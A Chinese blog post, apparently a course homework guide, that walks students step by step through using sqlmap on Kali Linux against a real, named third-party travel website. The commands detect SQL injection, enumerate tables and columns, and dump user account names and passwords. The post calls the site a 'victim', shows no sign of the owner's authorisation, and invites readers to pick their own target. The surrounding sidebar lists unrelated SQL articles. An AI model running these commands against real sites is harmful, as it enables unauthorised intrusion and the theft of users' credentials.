商大苦难计算机导论(SQL注入篇)

最新推荐文章于 2024-11-08 14:07:13 发布
最新推荐文章于 2024-11-08 14:07:13 发布
阅读量1.5k 收藏 1
点赞数 11
文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/AlanCorn_02/article/details/111085760
版权

一、准备工作
如果只在学校的电脑上耍可以跳过;
否则的话
需要安装VM Ware
安装Kali Linux虚拟机
这个教程很详细
最新超详细虚拟机VMware安装Kali Linux

其实虚拟机迟早都得学,都得用,我建议早点在自己电脑上装上
二、打开VM Ware 和 Kali linux
准备工作做好之后有手就行
三、打开Sqlmap工具
在这儿
在这里插入图片描述
四、找一个受害者(网站)
网站老师给的PPT里有,这里用最后一个做示范
在这里插入图片描述
五、进行迫害
1、先看看能不能进行sql注入(扫描)

PS:让你输入Y/n的时候一律输Y就完了(Y用小写也是可以的);
-u后面的是自己选的网址

sqlmap -u http://www.17tour.com.tw/newsCat.php?cat=1

一切正常的话大概会进到这块地方;
说明这个网站是可以的
在这里插入图片描述
2、爆表名

sqlmap -u http://www.17tour.com.tw/newsCat.php?cat=1 –tables

一切正常的话…
就能看到两个database(数据库)
这里只贴了一个
在这里插入图片描述
找到那个类似于user这样的数据表,记下它在哪个数据库下面,实例中是 tourtw_new17tour 这个数据库
在这里插入图片描述
3、爆列名

user是你刚刚找到的表;名字可能类似user不一定就是user

sqlmap -u http://www.17tour.com.tw/newsCat.php?cat=1 --columns -T "users"

一切顺利的话…
在这里插入图片描述
4、就可以看到我们的目标了

就是那个userAccount 和userPassword
记得类比为自己的(小声bb)

sqlmap -u http://www.17tour.com.tw/newsCat.php?cat=1 --dump -C "userAccount,userPassword"

最终结果
在这里插入图片描述
六、作业上传

暂时不用交,结课之后交
现阶段只要写个word
把步骤写好,每一步执行后把结果截图贴到word里

都看到这里了还不点个赞???

AlanCorn_02
关注
如何避免出现SQL注入漏洞
阿里云云栖号
09-09 2206
简介:本文将针对开发过程中依旧经常出现的SQL编码缺陷,讲解其背后原理及形成原因。并以几个常见漏洞存在形式,提醒技术同学注意相关问题。最后会根据原理,提供解决或缓解方案。 作者 | 阿里云安全团队 来源 | 阿里技术公众号 ‍‍‍‍‍‍‍‍ 一 前言 本文将针对开发过程中依旧经常出现的SQL编码缺陷,讲解其背后原理及形成原因。并以几个常见漏洞存在形式,提醒技术同学注意相关问题。最后会根据原理,提供解决或缓解方案。 二 SQL注入漏洞的原理、形成原因 SQL注入漏洞,根本上讲,是由于错把外部输.
如何避免出现 SQL 注入漏洞
阿里云技术
09-09 571
‍‍‍‍‍一 前言 本文将针对开发过程中依旧经常出现的SQL编码缺陷,讲解其背后原理及形成原因。并以几个常见漏洞存在形式,提醒技术同学注意相关问题。最后会根据原理,提供解决或缓解方案。 二 SQL注入漏洞的原理、形成原因 SQL注入漏洞,根本上讲,是由于错把外部输入当作SQL代码去执行。目前最佳的解决方案就是预编译的方式。 SQL语句在执行过程中,需要经过以下三大基本步骤: 代码语义分析 制定执行计划 获得返回结果 而一个SQL语句是由代码和数据两部分,如: SELECT id, nam..
计算机导论
11-27
计算机导论
一个网站SQL注入的案例
weixin_34281537的博客
06-29 364
网站的页面提交参数做了md5转换,而且参数会带入两个SQL语句中执行。 注入是肯定存在的,但是SQLMAP怎么都跑不出来(可能原因是其中有个SQL语句总是报错)。 尝试手工,发现 order by 报错。; ) 没关系,那就直接上union select。 经过尝试发现 union select 1,2,3,4,5,6,7,8,9,10 成功爆出显示位。下面写个脚本跑表,收工。 # -...
商大苦难计算机导论(小灯泡
AlanCorn_02的博客
12-12 2271
一、登陆 登录 2020计算机大类导论(第一组A) 使用: https://www.tinkercad.com/joinclass/LHRDX4F52XTP 登录 2020计算机大类导论(第一组B) 使用: https://www.tinkercad.com/joinclass/UNNGERQDCNQD 二、连线 横向连通 纵向连通 芯片引脚,用于输出高低电平,高为亮,低为灭 这里有个GND,代表接地即电势视为0(低),连到上面那块 三、代码 只写了一种样例,自认为比较能让人开窍 实际上就是C语言;看不
mysql初学者思路_初学SQL,有点头大,各位前辈有没有什么学习方法和学习思路呢?跪谢!...
weixin_32869031的博客
02-18 128
这是以前学SQL时候的一点存货,看见你这个问题就从硬盘的角落中拿出来了。现在将题目和答案分享一下。我使用的是MYSQL 5.0,但是绝大部分都是标准SQL。表结构:CREATE TABLE STUDENT(SNO VARCHAR(3) NOT NULL,SNAME VARCHAR(4) NOT NULL,SSEX VARCHAR(2) NOT NULL,SBIRTHDAY DATETIME,CLA...
计算机导论sql试题,数据库SQL语句练习题及答案
weixin_29958569的博客
07-05 376
一、设有一数据库,包括四个表:学生表(Student)、课程表(Course)、成绩表(Score)以及教师信息表(Teacher)。四个表的结构分别如表1-1的表(一)~表(四)所示,数据如表1-2的表(一)~表(四)所示。用SQL语句创建四个表并完成相关题目。表1-1数据库的表结构表(一)Student属性名数据类型可否为空含 义SnoChar(3)否学号(主码)SnameChar(4)否学...
sql学习 索引去哪儿_回收站还原表后的苦难经历.sql
02-11
sql学习 索引去哪儿_回收站还原表后的苦难经历.sql
2024新版大学计算机基础教程47集全(组成原理+网络+操作系统)视频+配套资料
04-25
很多跨专业学习计算机编程的同学,都需要先掌握计算机基础知识,包括计算机组成原理、操作系统、计算机网络这三部分的知识,而这三部分的内容大家想一口气学会,是有些苦难的,且需要大量的时间。 这套计算机底层...
苦难辉煌读后感1000字范文(16).pdf
11-14
苦难辉煌读后感】 这文章主要围绕两本书的内容展开,分别是关于史蒂夫·乔布斯的传记和周国平的《愿生命从容》。这两本书分别讲述了不同领域的辉煌与苦难,一个是科技巨头乔布斯的非凡人生,另一个是哲学家...
计算机导论考试题库大全
12-19
计算机导论考试题库大全,单选题,多选题,判断题,总共有800多道
计算机导论1
palawind
05-06 618
文章目录
计算机理论:SQL语言简单总结
北冥有鱼wyh的博客
12-11 263
SQL支持数据库三级模式,即内模式、模式和外模式。其中,内模式对应存储文件,模式对应基本表,外模式对应视图。 数据定义:create、alter、drop 数据操纵:insert、update、delete 数据查询:select 数据控制:grant、revoke ...
计算机导论9
palawind
05-13 244
计算机科学与技术学科 本讲概述-个人发展规划和大学如何学习(含所有PPT教学课件之PDF版) 什么是计算机科学与技术学科 学科典型的研究方向综合介绍 软件工程学科方向 ...
SQL注入环境搭建及多种注入类型测试实验
晓宇的博客
04-14 5678
SQL注入环境搭建及多种注入类型测试实验
计算机导论sql试题,sql语句查询 练习题
weixin_42101164的博客
07-05 800
sql 练习题答案不一定正确,部分没有答案一、已知有如下表,请用sql语句在mysql里建立相应的表表1 学生表(student)列名意义类型约束sno学号varchar(3)主键sname姓名varchar(4)非空ssex性别varchar(2)sbirthday生日datetimeclass班级编号varchar(5)非空表2 课程表(course)列名意义类型约束cno课程号varcha...
SQL练习】经典SQL练习题
热门推荐
墨染百城
04-03 14万+
准备数据建表语句CREATE TABLE students (sno VARCHAR(3) NOT NULL, sname VARCHAR(4) NOT NULL, ssex VARCHAR(2) NOT NULL, sbirthday DATETIME, class VARCHAR(5))CREATE TABLE courses (cno VARCHAR(5) NOT NULL, cname
计算机导论sql试题,数据库SQL语句练习题(示例代码)
weixin_26802933的博客
07-05 589
一、 设有一数据库,包括四个表:学生表(Student)、课程表(Course)、成绩表(Score)以及教师信息表(Teacher)。四个表的结构分别如表1-1的表(一)~表(四)所示,数据如表1-2的表(一)~表(四)所示。用SQL语句创建四个表并完成相关题目。表1-1数据库的表结构表(一)Student (学生表)属性名数据类型可否为空含 义Snovarchar (20...
如何在Linux中使用Cron定时执行SQL任务
最新发布
Mr_Wanter
11-08 602
linux crontab 定时执行sql脚本。
大学英语4 Unit One 词汇与句型解析
资料是关于大学英语课程第四单元的课后习题答案,涵盖了词汇、搭配、词组、语法结构和翻译等多个方面,旨在帮助学生巩固和检验对本单元英语知识的理解与掌握。 在词汇部分(III),给出了10个单词的中文解释: ...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值